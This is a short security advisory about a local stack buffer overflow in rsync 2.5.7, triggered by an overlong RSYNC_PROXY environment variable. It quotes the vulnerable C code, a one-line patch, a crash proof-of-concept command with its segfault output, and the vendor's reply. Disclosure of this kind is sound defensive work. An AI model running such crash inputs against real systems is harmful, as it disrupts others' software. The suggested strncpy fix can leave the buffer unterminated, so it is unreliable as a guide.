|
Brought to you by:
Suppliers of:
|
|
|
| |
| "rsync is an open source utility that provides fast incremental file transfer. rsync is freely available under the GNU General Public License version 2". A local buffer overflow exist in rsync, a malicious user can export a long "RSYNC_PROXY" environment variable and crash rsync. |
| |
Credit:
The information has been provided by DownBload.
|
| |
Vulnerable Systems:
* rsync version 2.5.7 and prior
Immune Systems:
* rsync version 2.6.1 (will be released in the next month or two)
The problem is in open_socket_out function (socket.c). Attacker can overflow portbuf[10] buffer on stack and overwrite saved return address. Rsync isn't suid so user cannot escalate privileges to root.
Vulnerable code:
- socket.c
...
char portbuf[10];
char *h;
int proxied = 0;
char buffer[1024];
char *cp;
h = getenv("RSYNC_PROXY");
proxied = (h != NULL) && (*h != '\0');
if (proxied) {
strlcpy(buffer, h, sizeof(buffer));
cp = strchr(buffer, ':');
if (cp == NULL) {
rprintf(FERROR,
"invalid proxy specification: should beHOST:PORT\n");
return -1;
}
*cp++ = '\0';
strcpy(portbuf, cp); // < - OVERFLOW
...
Patch:
Replace the vulnerable line with: strncpy(portbuf, cp, 10);
PoC:
# export RSYNC_PROXY=`perl -e 'print "A" x100,":","A" x 1000'`
# rsync localhost::rsync: getaddrinfo:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: ai_family not supported
Segmentation fault
[root@localhost rsync-2.5.7]#
Vendor response:
"Correct. I fixed this in the CVS version earlier this year. Since the proxy data is coming from the local environment, I don't see a need to roll out an update to 2.6.0 (which is the latest released version, BTW). The fix will be in 2.6.1, which should be released in the next month or two."
|
|
|
|
|
